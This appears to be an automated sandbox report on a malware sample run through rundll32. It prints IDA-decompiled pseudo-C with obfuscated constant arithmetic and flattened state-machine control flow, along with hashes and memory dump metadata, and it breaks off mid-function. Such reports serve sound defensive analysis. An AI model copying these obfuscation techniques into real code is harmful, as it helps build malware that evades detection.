                                                                                                                    							E003347CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0034DCF7(_v2620, 0x331308, _t515),  &_v1560, _v2720, _v2688);
                                                                                                                    							E0033A8B0(_v2608, _t437, _v2644);
                                                                                                                    							_t454 = _v2760;
                                                                                                                    							_t425 = E0033EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
                                                                                                                    							_t507 =  &(_t507[0x17]);
                                                                                                                    							if(_t425 != 0) {
                                                                                                                    								_t503 = 0x5de06da;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t425;
                                                                                                                    				}
                                                                                                                    				_push(_v2616);
                                                                                                                    				_push(_v2628);
                                                                                                                    				_push(_v2716);
                                                                                                                    				_push( &_v1040);
                                                                                                                    				E003446BB(_v2744, _v2752);
                                                                                                                    				_push(_v2668);
                                                                                                                    				_push(_v2736);
                                                                                                                    				E003347CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0034DCF7(_v2708, 0x331348, __eflags),  &_v2080, _v2700, _v2664);
                                                                                                                    				_t458 = _v2728;
                                                                                                                    				E0033A8B0(_t458, _t428, _v2632);
                                                                                                                    				_push(_v2692);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_t458);
                                                                                                                    				_push(0);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_v2624);
                                                                                                                    				_t454 = _v2676;
                                                                                                                    				_push( &_v520);
                                                                                                                    				_t425 = E0033AB87(_v2676, _v2724, __eflags);
                                                                                                                    				_t507 = _t507 - 0xc + 0x64;
                                                                                                                    				_t503 = 0xa8e801c;
                                                                                                                    				goto L8;
                                                                                                                    			}

                                                                                                                    0x0033f611
                                                                                                                    0x0033f61c
                                                                                                                    0x0033f624
                                                                                                                    0x0033f62c
                                                                                                                    0x0033f630
                                                                                                                    0x0033f638
                                                                                                                    0x0033f640
                                                                                                                    0x0033f648
                                                                                                                    0x0033f650
                                                                                                                    0x0033f658
                                                                                                                    0x0033f663
                                                                                                                    0x0033f66b
                                                                                                                    0x0033f676
                                                                                                                    0x0033f67e
                                                                                                                    0x0033f686
                                                                                                                    0x0033f68e
                                                                                                                    0x0033f696
                                                                                                                    0x0033f6a4
                                                                                                                    0x0033f7b0
                                                                                                                    0x00000000
                                                                                                                    0x0033f6aa
                                                                                                                    0x0033f6aa
                                                                                                                    0x0033f6b0
                                                                                                                    0x0033f883
                                                                                                                    0x0033f883
                                                                                                                    0x0033f889
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033f6b6
                                                                                                                    0x0033f6d2
                                                                                                                    0x0033f700
                                                                                                                    0x0033f70a
                                                                                                                    0x0033f70f
                                                                                                                    0x0033f71b
                                                                                                                    0x0033f762
                                                                                                                    0x0033f777
                                                                                                                    0x0033f795
                                                                                                                    0x0033f799
                                                                                                                    0x0033f79e
                                                                                                                    0x0033f7a3
                                                                                                                    0x0033f7a9
                                                                                                                    0x00000000
                                                                                                                    0x0033f7a9
                                                                                                                    0x0033f7a3
                                                                                                                    0x0033f6b0
                                                                                                                    0x0033f898
                                                                                                                    0x0033f898
                                                                                                                    0x0033f7ba
                                                                                                                    0x0033f7c8
                                                                                                                    0x0033f7cf
                                                                                                                    0x0033f7de
                                                                                                                    0x0033f7df
                                                                                                                    0x0033f7e4
                                                                                                                    0x0033f7f0
                                                                                                                    0x0033f837
                                                                                                                    0x0033f843
                                                                                                                    0x0033f849
                                                                                                                    0x0033f858
                                                                                                                    0x0033f85c
                                                                                                                    0x0033f85e
                                                                                                                    0x0033f85f
                                                                                                                    0x0033f861
                                                                                                                    0x0033f863
                                                                                                                    0x0033f86e
                                                                                                                    0x0033f875
                                                                                                                    0x0033f876
                                                                                                                    0x0033f87b
                                                                                                                    0x0033f87e
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: kD$)$5$<!$Q0
                                                                                                                    • API String ID: 0-101729813
                                                                                                                    • Opcode ID: 2df1e7ca13c7512820df859dd4d65bfd91544a9bd5433958c26c3197f4237c74
                                                                                                                    • Instruction ID: 5a189faa8a94295ef3b211b348f1c3352bb87a82ff4523e9d121d84cc5e13b99
                                                                                                                    • Opcode Fuzzy Hash: 2df1e7ca13c7512820df859dd4d65bfd91544a9bd5433958c26c3197f4237c74
                                                                                                                    • Instruction Fuzzy Hash: 7E1200715083809FD3A9CF21C48AA4BFBE2FBC5758F50891DE5D98A260D7B58949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00340001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                    				char _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				intOrPtr _v136;
                                                                                                                    				intOrPtr _v140;
                                                                                                                    				char _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				void* _t154;
                                                                                                                    				void* _t174;
                                                                                                                    				char _t178;
                                                                                                                    				void* _t183;
                                                                                                                    				char* _t189;
                                                                                                                    				void* _t209;
                                                                                                                    				signed int _t210;
                                                                                                                    				signed int _t211;
                                                                                                                    				signed int _t212;
                                                                                                                    				signed int _t213;
                                                                                                                    				signed int _t214;
                                                                                                                    				signed int _t215;
                                                                                                                    				signed int _t216;
                                                                                                                    				signed int* _t220;
                                                                                                                    
                                                                                                                    				_push(_a4);
                                                                                                                    				_t209 = __edx;
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t154);
                                                                                                                    				_v132 = _v132 & 0x00000000;
                                                                                                                    				_t220 =  &(( &_v204)[3]);
                                                                                                                    				_v140 = 0x6f537b;
                                                                                                                    				_v136 = 0x2895cf;
                                                                                                                    				_t183 = 0xf669bfa;
                                                                                                                    				_v164 = 0xc3509d;
                                                                                                                    				_v164 = _v164 >> 0xf;
                                                                                                                    				_v164 = _v164 ^ 0x0007728b;
                                                                                                                    				_v188 = 0x58efa0;
                                                                                                                    				_v188 = _v188 + 0xffff9444;
                                                                                                                    				_t210 = 0x2f;
                                                                                                                    				_v188 = _v188 / _t210;
                                                                                                                    				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                    				_v176 = 0xa783cc;
                                                                                                                    				_v176 = _v176 << 0xa;
                                                                                                                    				_v176 = _v176 ^ 0x73295065;
                                                                                                                    				_v176 = _v176 ^ 0xed239367;
                                                                                                                    				_v148 = 0x42262a;
                                                                                                                    				_v148 = _v148 | 0x228e56d6;
                                                                                                                    				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                    				_v204 = 0xc47428;
                                                                                                                    				_v204 = _v204 + 0xffff2e33;
                                                                                                                    				_v204 = _v204 + 0xffff2fa2;
                                                                                                                    				_v204 = _v204 + 0xffff28a7;
                                                                                                                    				_v204 = _v204 ^ 0x00c63754;
                                                                                                                    				_v156 = 0x11bd56;
                                                                                                                    				_t211 = 0x5c;
                                                                                                                    				_v156 = _v156 * 0x6a;
                                                                                                                    				_v156 = _v156 ^ 0x0752342f;
                                                                                                                    				_v172 = 0x489beb;
                                                                                                                    				_v172 = _v172 + 0xfe21;
                                                                                                                    				_v172 = _v172 / _t211;
                                                                                                                    				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                    				_v192 = 0x2e5859;
                                                                                                                    				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                    				_t212 = 0x44;
                                                                                                                    				_v192 = _v192 / _t212;
                                                                                                                    				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                    				_v180 = 0x89bc6d;
                                                                                                                    				_v180 = _v180 | 0xb1d25d45;
                                                                                                                    				_v180 = _v180 << 0xe;
                                                                                                                    				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                    				_v168 = 0x19805c;
                                                                                                                    				_t213 = 0x18;
                                                                                                                    				_v168 = _v168 * 0x16;
                                                                                                                    				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                    				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                    				_v196 = 0x9cfdcd;
                                                                                                                    				_v196 = _v196 / _t213;
                                                                                                                    				_v196 = _v196 + 0xd8a6;
                                                                                                                    				_v196 = _v196 ^ 0x0005e56c;
                                                                                                                    				_v200 = 0x1d77da;
                                                                                                                    				_t214 = 0x6b;
                                                                                                                    				_v200 = _v200 / _t214;
                                                                                                                    				_t215 = 9;
                                                                                                                    				_v200 = _v200 / _t215;
                                                                                                                    				_t216 = 0x59;
                                                                                                                    				_v200 = _v200 / _t216;
                                                                                                                    				_v200 = _v200 ^ 0x00052bad;
                                                                                                                    				_v184 = 0x474669;
                                                                                                                    				_v184 = _v184 * 0x25;
                                                                                                                    				_v184 = _v184 + 0xffff8141;
                                                                                                                    				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                    				_v160 = 0x98ddfb;
                                                                                                                    				_v160 = _v160 << 3;
                                                                                                                    				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                    				_v152 = 0xbbc225;
                                                                                                                    				_v152 = _v152 * 0x58;
                                                                                                                    				_v152 = _v152 ^ 0x408ec409;
                                                                                                                    				while(_t183 != 0x4a2a3c4) {
                                                                                                                    					if(_t183 == 0x640e5f9) {
                                                                                                                    						__eflags = _v128;
                                                                                                                    						_t189 =  &_v128;
                                                                                                                    						while(__eflags != 0) {
                                                                                                                    							_t178 =  *_t189;
                                                                                                                    							__eflags = _t178 - 0x30;
                                                                                                                    							if(_t178 < 0x30) {
                                                                                                                    								L10:
                                                                                                                    								__eflags = _t178 - 0x61;
                                                                                                                    								if(_t178 < 0x61) {
                                                                                                                    									L12:
                                                                                                                    									__eflags = _t178 - 0x41;
                                                                                                                    									if(_t178 < 0x41) {
                                                                                                                    										L14:
                                                                                                                    										 *_t189 = 0x58;
                                                                                                                    									} else {
                                                                                                                    										__eflags = _t178 - 0x5a;
                                                                                                                    										if(_t178 > 0x5a) {
                                                                                                                    											goto L14;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t178 - 0x7a;
                                                                                                                    									if(_t178 > 0x7a) {
                                                                                                                    										goto L12;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t178 - 0x39;
                                                                                                                    								if(_t178 > 0x39) {
                                                                                                                    									goto L10;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t189 = _t189 + 1;
                                                                                                                    							__eflags =  *_t189;
                                                                                                                    						}
                                                                                                                    						_t183 = 0x4a2a3c4;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						if(_t183 == 0x7562914) {
                                                                                                                    							_v144 = 0x80;
                                                                                                                    							_t178 = E0033CD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                    							_t220 =  &(_t220[3]);
                                                                                                                    							_t183 = 0x640e5f9;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t183 == 0xf669bfa) {
                                                                                                                    								_t183 = 0x7562914;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					L18:
                                                                                                                    					__eflags = _t183 - 0x1718ff4;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					return _t178;
                                                                                                                    				}
                                                                                                                    				_push(_v172);
                                                                                                                    				_push(_v156);
                                                                                                                    				_push(_v204);
                                                                                                                    				_t174 = E00348606(_v148, 0x331690, __eflags);
                                                                                                                    				E00332206( &_v128, _t209, _v196, _v200, _t174, E0033EE81(__eflags), _v184);
                                                                                                                    				_t178 = E0033A8B0(_v160, _t174, _v152);
                                                                                                                    				_t220 =  &(_t220[0xb]);
                                                                                                                    				_t183 = 0x1718ff4;
                                                                                                                    				goto L18;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                    • API String ID: 0-3810143839
                                                                                                                    • Opcode ID: 0d0154b57350d9985deca02ba2f228b16e2a84d19a59fc2fad7a71d4439b6709
                                                                                                                    • Instruction ID: 508258e7ffd7325edfa96ca76a486022b6c7ecf41552f548bc214b207c7bdd0c
                                                                                                                    • Opcode Fuzzy Hash: 0d0154b57350d9985deca02ba2f228b16e2a84d19a59fc2fad7a71d4439b6709
                                                                                                                    • Instruction Fuzzy Hash: 6A81A7716093419BD3A8CF25D589A1BBBE2FBC5718F00591DF2C59A2A0D3B8D949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00337735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				char _v44;
                                                                                                                    				void* _v56;
                                                                                                                    				intOrPtr _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				unsigned int _v112;
                                                                                                                    				unsigned int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				void* __ecx;
                                                                                                                    				void* _t163;
                                                                                                                    				signed int _t176;
                                                                                                                    				void* _t188;
                                                                                                                    				signed int _t205;
                                                                                                                    				signed int* _t207;
                                                                                                                    				void* _t209;
                                                                                                                    				void* _t210;
                                                                                                                    
                                                                                                                    				_t186 = _a4;
                                                                                                                    				_t207 = _a8;
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_t207);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t163);
                                                                                                                    				_v60 = 0x524796;
                                                                                                                    				_t210 = _t209 + 0x18;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t188 = 0x9c25eae;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v76 = 0x29f01;
                                                                                                                    				_v76 = _v76 | 0x94be009d;
                                                                                                                    				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                    				_v108 = 0xafa956;
                                                                                                                    				_v108 = _v108 + 0x628;
                                                                                                                    				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                    				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                    				_v92 = 0x300c11;
                                                                                                                    				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                    				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                    				_v116 = 0x7fd72e;
                                                                                                                    				_v116 = _v116 >> 0x10;
                                                                                                                    				_v116 = _v116 + 0x5d9b;
                                                                                                                    				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                    				_v88 = 0x25a82f;
                                                                                                                    				_t205 = 0x1b;
                                                                                                                    				_v88 = _v88 * 0x72;
                                                                                                                    				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                    				_v100 = 0xf91ce5;
                                                                                                                    				_v100 = _v100 >> 0xc;
                                                                                                                    				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                    				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                    				_v136 = 0x5a524;
                                                                                                                    				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                    				_v136 = _v136 / _t205;
                                                                                                                    				_v136 = _v136 + 0xdad4;
                                                                                                                    				_v136 = _v136 ^ 0x03c43220;
                                                                                                                    				_v68 = 0xd5537a;
                                                                                                                    				_v68 = _v68 + 0xffffd52f;
                                                                                                                    				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                    				_v128 = 0x59397b;
                                                                                                                    				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                    				_v128 = _v128 + 0x56f6;
                                                                                                                    				_v128 = _v128 + 0xff83;
                                                                                                                    				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                    				_v104 = 0x85edfa;
                                                                                                                    				_v104 = _v104 | 0x32b3baf7;
                                                                                                                    				_v104 = _v104 ^ 0x32b12396;
                                                                                                                    				_v112 = 0x4c4fc6;
                                                                                                                    				_v112 = _v112 + 0xbf9f;
                                                                                                                    				_v112 = _v112 >> 1;
                                                                                                                    				_v112 = _v112 ^ 0x002f2047;
                                                                                                                    				_v120 = 0xc21a43;
                                                                                                                    				_v120 = _v120 | 0x0781619f;
                                                                                                                    				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                    				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                    				_v84 = 0xaf6a80;
                                                                                                                    				_v84 = _v84 + 0xffff12f3;
                                                                                                                    				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                    				_v64 = 0x7bdfb0;
                                                                                                                    				_v64 = _v64 >> 2;
                                                                                                                    				_v64 = _v64 ^ 0x00114c08;
                                                                                                                    				_v96 = 0x6b35de;
                                                                                                                    				_v96 = _v96 * 0x60;
                                                                                                                    				_v96 = _v96 ^ 0x283b6418;
                                                                                                                    				_v124 = 0x52b9d2;
                                                                                                                    				_v124 = _v124 | 0x40c5122c;
                                                                                                                    				_v124 = _v124 << 8;
                                                                                                                    				_v124 = _v124 >> 0x10;
                                                                                                                    				_v124 = _v124 ^ 0x0001910d;
                                                                                                                    				_v132 = 0x44d0f9;
                                                                                                                    				_v132 = _v132 * 0x29;
                                                                                                                    				_v132 = _v132 + 0xf17;
                                                                                                                    				_v132 = _v132 * 0x65;
                                                                                                                    				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                    				_v72 = 0xc75ad6;
                                                                                                                    				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                    				_v72 = _v72 ^ 0xe072572c;
                                                                                                                    				_v80 = 0xa6c1d6;
                                                                                                                    				_v80 = _v80 + 0xc8d;
                                                                                                                    				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                    				do {
                                                                                                                    					while(_t188 != 0xe27b71) {
                                                                                                                    						if(_t188 == 0x372e88b) {
                                                                                                                    							_push(_t188);
                                                                                                                    							_push(_t188);
                                                                                                                    							_t176 = E00337FF2(_t207[1]);
                                                                                                                    							 *_t207 = _t176;
                                                                                                                    							__eflags = _t176;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								_t188 = 0xe27b71;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t188 == 0x93f98fe) {
                                                                                                                    								_t207[1] = E00350C14(_t186);
                                                                                                                    								_t188 = 0x372e88b;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t188 == 0x9c25eae) {
                                                                                                                    									_t188 = 0x93f98fe;
                                                                                                                    									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                    									_t207[1] = _v76;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t188 == 0xa0c9f29) {
                                                                                                                    										_t146 =  &_v112; // 0x2f2047
                                                                                                                    										E00340DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                    										_t210 = _t210 + 0x10;
                                                                                                                    										_t188 = 0xc7f60b3;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t188 == 0xc7f60b3) {
                                                                                                                    											_t144 =  &_v84; // 0xe072572c
                                                                                                                    											E00350E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                    											_t210 = _t210 + 0x10;
                                                                                                                    											_t188 = 0xcf8cba1;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											_t219 = _t188 - 0xcf8cba1;
                                                                                                                    											if(_t188 != 0xcf8cba1) {
                                                                                                                    												goto L17;
                                                                                                                    											} else {
                                                                                                                    												E00350E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L9:
                                                                                                                    						return 0 |  *_t207 != 0x00000000;
                                                                                                                    					}
                                                                                                                    					E00333DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                    					_t210 = _t210 + 0xc;
                                                                                                                    					_t188 = 0xa0c9f29;
                                                                                                                    					L17:
                                                                                                                    					__eflags = _t188 - 0x560a718;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L9;
                                                                                                                    			}

                                                                                                                    0x00337a93
                                                                                                                    0x00000000
                                                                                                                    0x003379cb
                                                                                                                    0x003379d1
                                                                                                                    0x00337a7c
                                                                                                                    0x00337a7e
                                                                                                                    0x00337a81
                                                                                                                    0x00000000
                                                                                                                    0x003379d7
                                                                                                                    0x003379dd
                                                                                                                    0x00337a4f
                                                                                                                    0x00337a66
                                                                                                                    0x00337a6b
                                                                                                                    0x00337a6e
                                                                                                                    0x00000000
                                                                                                                    0x003379df
                                                                                                                    0x003379e5
                                                                                                                    0x00337a35
                                                                                                                    0x00337a3d
                                                                                                                    0x00337a42
                                                                                                                    0x00337a45
                                                                                                                    0x00000000
                                                                                                                    0x003379e7
                                                                                                                    0x003379e7
                                                                                                                    0x003379ed
                                                                                                                    0x00000000
                                                                                                                    0x003379f3
                                                                                                                    0x00337a0b
                                                                                                                    0x00337a10
                                                                                                                    0x003379ed
                                                                                                                    0x003379e5
                                                                                                                    0x003379dd
                                                                                                                    0x003379d1
                                                                                                                    0x003379c5
                                                                                                                    0x00337a13
                                                                                                                    0x00337a24
                                                                                                                    0x00337a24
                                                                                                                    0x00337ad8
                                                                                                                    0x00337add
                                                                                                                    0x00337ae0
                                                                                                                    0x00337ae5
                                                                                                                    0x00337ae5
                                                                                                                    0x00337ae5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                    • API String ID: 0-2956538602
                                                                                                                    • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                    • Instruction ID: 7eb449475dc396b7c1375fdc4b9a4d8532ea4b3ef40b1c2033354532d2356c48
                                                                                                                    • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                    • Instruction Fuzzy Hash: F0912EB11093419FD7A9CF65D58692BBBE1FBC4748F109A1CF29296220D3B5CA498F43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00334816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				char _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				void* _t164;
                                                                                                                    				void* _t179;
                                                                                                                    				signed int _t190;
                                                                                                                    				signed int _t191;
                                                                                                                    				signed int _t192;
                                                                                                                    				signed int _t193;
                                                                                                                    				void* _t196;
                                                                                                                    				void* _t213;
                                                                                                                    				void* _t214;
                                                                                                                    				signed int* _t217;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t213 = __edx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t164);
                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                    				_t217 =  &(( &_v88)[6]);
                                                                                                                    				_v16 = 0xc0a747;
                                                                                                                    				_v12 = 0xade381;
                                                                                                                    				_t214 = 0;
                                                                                                                    				_v8 = 0x11050f;
                                                                                                                    				_t196 = 0x5adc597;
                                                                                                                    				_v84 = 0xdf9e69;
                                                                                                                    				_v84 = _v84 >> 2;
                                                                                                                    				_v84 = _v84 + 0xffff5795;
                                                                                                                    				_v84 = _v84 >> 5;
                                                                                                                    				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                    				_v68 = 0xf2d8cd;
                                                                                                                    				_v68 = _v68 << 6;
                                                                                                                    				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                    				_v68 = _v68 + 0xec5a;
                                                                                                                    				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                    				_v40 = 0x5d8c34;
                                                                                                                    				_v40 = _v40 >> 9;
                                                                                                                    				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                    				_v28 = 0x37ca39;
                                                                                                                    				_v28 = _v28 | 0x456668c2;
                                                                                                                    				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                    				_v80 = 0xd16358;
                                                                                                                    				_v80 = _v80 ^ 0xe637ce9d;
                                                                                                                    				_t190 = 0x68;
                                                                                                                    				_v80 = _v80 * 0x4b;
                                                                                                                    				_v80 = _v80 << 2;
                                                                                                                    				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                    				_v56 = 0xfc1806;
                                                                                                                    				_v56 = _v56 + 0xffffb57d;
                                                                                                                    				_v56 = _v56 | 0x299c1b97;
                                                                                                                    				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                    				_v44 = 0x81586;
                                                                                                                    				_v44 = _v44 | 0xba5390c4;
                                                                                                                    				_v44 = _v44 ^ 0xba584850;
                                                                                                                    				_v60 = 0x52e6aa;
                                                                                                                    				_v60 = _v60 >> 0xa;
                                                                                                                    				_v60 = _v60 * 0x28;
                                                                                                                    				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                    				_v48 = 0x7a334;
                                                                                                                    				_v48 = _v48 + 0xfffff5af;
                                                                                                                    				_v48 = _v48 ^ 0x0009652d;
                                                                                                                    				_v52 = 0x3bf8e8;
                                                                                                                    				_v52 = _v52 / _t190;
                                                                                                                    				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                    				_v64 = 0xacc490;
                                                                                                                    				_t191 = 0x6f;
                                                                                                                    				_v64 = _v64 / _t191;
                                                                                                                    				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                    				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                    				_v88 = 0x557b83;
                                                                                                                    				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                    				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                    				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                    				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                    				_v24 = 0xa24557;
                                                                                                                    				_t192 = 0x23;
                                                                                                                    				_v24 = _v24 / _t192;
                                                                                                                    				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                    				_v72 = 0x274d3f;
                                                                                                                    				_v72 = _v72 + 0x3236;
